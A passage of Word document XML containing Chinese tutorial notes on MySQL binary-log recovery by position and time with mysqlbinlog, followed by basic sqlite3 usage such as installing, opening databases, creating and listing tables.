        <w:t>SET SESSION sql_log_bin=0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C55D146" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恢复二进制日志记录功能：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SET SESSION sql_log_bin=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434A47CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B0F6AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行基于时间、位置的恢复时，务必先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>binlog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看文件的时间、位置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F388EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般恢复</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D8327A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mysqlbinlog --no-defaults </w:t>
      </w:r>
      <w:r>
        <w:t>增量备份文件</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> | mysql -u </w:t>
      </w:r>
      <w:r>
        <w:t>用户名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C15585F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69EC1D7C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于位置恢复</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22340A3F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>恢复数据到指定位置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4179D174" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysqlbinlog --stop-position='</w:t>
      </w:r>
      <w:r>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">id' </w:t>
      </w:r>
      <w:r>
        <w:t>二进制日志</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> |mysql -u </w:t>
      </w:r>
      <w:r>
        <w:t>用户名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:r>
        <w:t>密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79651C50" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>从指定的位置开始恢复数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FC2CB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysqlbinlog --start-position='</w:t>
      </w:r>
      <w:r>
        <w:t>操作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">id' </w:t>
      </w:r>
      <w:r>
        <w:t>二进制日志</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> |mysql -u </w:t>
      </w:r>
      <w:r>
        <w:t>用户名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:r>
        <w:t>密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034C2181" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AAE0E1C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225FFD27" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysqlbinlog --start-position=353 --stop-position=664 /data/binlog/master-bin.000002 &gt; /tmp/hellodb.1.inc.sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577F7564" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于时间点恢复</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC76E52" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里完全可以写个时间段，这里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>start-datetime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>stop-datetime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不需要必须按照</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>binlog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中出现的时间来写。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E01655" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC58CDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78B95617" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>从日志开头截止到某个时间点的恢复</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7928BAD2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysqlbinlog [--no-defaults] --stop-datetime='</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>日</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>小时</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>分钟</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>秒</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:t>二进制日志</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> |mysql -u </w:t>
      </w:r>
      <w:r>
        <w:t>用户名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:r>
        <w:t>密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A93FDE8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A806B40" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>从某个时间点到日志结尾的恢复</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9F320A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysqlbinlog [--no-defaults] --start-datetime='</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>日</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>小时</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>分钟</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>秒</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:t>二进制日志</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> |mysql -u </w:t>
      </w:r>
      <w:r>
        <w:t>用户名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:r>
        <w:t>密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254FA7E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE88BD9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>从某个时间点到某个时间点的恢复</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234A029D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mysqlbinlog [--no-defaults] --start-datetime='</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>日</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>小时</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>分钟</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>秒</w:t>
      </w:r>
      <w:r>
        <w:t>' --stop-datetime='</w:t>
      </w:r>
      <w:r>
        <w:t>年</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>日</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>小时</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>分钟</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>秒</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:t>二进制日志</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> |mysql -u </w:t>
      </w:r>
      <w:r>
        <w:t>用户名</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:r>
        <w:t>密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69530165" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30698105" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8763EC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17113D0A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B5F561E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc159779557"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他的备份工具</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p w14:paraId="63777A30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>xtrabackup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7997739A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="423AD7ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>mydumper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667A7809" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="035BE26A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7709BA9F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4955DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="576F8235" w14:textId="0BAF46D7" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C114439" w14:textId="53CA67EE" w:rsidR="005451E6" w:rsidRDefault="005451E6" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc159779558"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>sqlite3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
    </w:p>
    <w:p w14:paraId="1701ED0E" w14:textId="3FEFF286" w:rsidR="005451E6" w:rsidRDefault="005451E6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7337E09C" w14:textId="37D4BC53" w:rsidR="005451E6" w:rsidRDefault="005451E6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>apt install sqlite3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77499D1B" w14:textId="69A26A6D" w:rsidR="005451E6" w:rsidRDefault="005451E6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D9D64E" w14:textId="38B25A6C" w:rsidR="00706FF2" w:rsidRPr="005451E6" w:rsidRDefault="00706FF2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00801C0F" w:rsidRPr="00801C0F">
        <w:t>https://www.runoob.com/sqlite/sqlite-installation.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3D4B91" w14:textId="19B2408F" w:rsidR="005451E6" w:rsidRDefault="005451E6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66636D43" w14:textId="1B169F13" w:rsidR="00935C70" w:rsidRDefault="00935C70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7991DF2D" w14:textId="270CF898" w:rsidR="00935C70" w:rsidRDefault="00935C70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00935C70">
        <w:t>quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A9B204" w14:textId="695E42E1" w:rsidR="00935C70" w:rsidRDefault="00935C70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="603894CB" w14:textId="35F8075D" w:rsidR="007750F2" w:rsidRDefault="007750F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看数据库列表：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004F167D">
        <w:t>.databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6E48EA" w14:textId="77777777" w:rsidR="007750F2" w:rsidRDefault="007750F2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="670EA023" w14:textId="40C029B6" w:rsidR="00935C70" w:rsidRDefault="00935C70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00935C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建数据库：</w:t>
      </w:r>
      <w:r w:rsidRPr="00935C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlite3 databasename.db(</w:t>
      </w:r>
      <w:r w:rsidRPr="00935C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意直接在</w:t>
      </w:r>
      <w:r w:rsidRPr="00935C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00935C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中输入这条语句，不要在</w:t>
      </w:r>
      <w:r w:rsidRPr="00935C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqlite3</w:t>
      </w:r>
      <w:r w:rsidRPr="00935C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境中输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00935C70">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AF67F2" w14:textId="5F33927E" w:rsidR="00935C70" w:rsidRDefault="00935C70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="000B2DE9" w14:textId="77777777" w:rsidR="008739B2" w:rsidRDefault="008739B2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除数据库：直接把目录下的数据库文件删除就可以了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ED031C" w14:textId="77777777" w:rsidR="008739B2" w:rsidRDefault="008739B2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5887D4F9" w14:textId="1328901D" w:rsidR="00935C70" w:rsidRDefault="008739B2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>选择数据库：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.open +</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D969BA" w14:textId="03B9F963" w:rsidR="00935C70" w:rsidRDefault="00935C70" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="749D9B5A" w14:textId="39185ECE" w:rsidR="004C36E8" w:rsidRDefault="004C36E8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要先选中数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中差不多</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73699C9B" w14:textId="5756D438" w:rsidR="004C36E8" w:rsidRDefault="004C36E8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>CREATE TABLE Student(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8D3D7A" w14:textId="76F9E557" w:rsidR="004C36E8" w:rsidRDefault="004C36E8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ID INT PRIMARY KEY NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516AEBF0" w14:textId="6BE03902" w:rsidR="004C36E8" w:rsidRDefault="004C36E8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>NAME VARCHAR(20),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A10543" w14:textId="6F8E6831" w:rsidR="00935C70" w:rsidRDefault="004C36E8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>AGE INT);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4540093A" w14:textId="44AEBF6D" w:rsidR="004C36E8" w:rsidRDefault="004C36E8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02747C58" w14:textId="77777777" w:rsidR="001C5C04" w:rsidRDefault="001C5C04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看数据库中有哪些表：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D2E0E8" w14:textId="77777777" w:rsidR="001C5C04" w:rsidRDefault="001C5C04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A0B132E" w14:textId="099ED757" w:rsidR="001C5C04" w:rsidRDefault="001C5C04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看表的字段信息：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.schema+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EB8F98" w14:textId="77777777" w:rsidR="001C5C04" w:rsidRDefault="001C5C04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48F0A9C9" w14:textId="2DED15C5" w:rsidR="001C5C04" w:rsidRDefault="001C5C04" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除指定的表：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>drop table +</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表名</w:t>
      </w:r>
    </w:p>
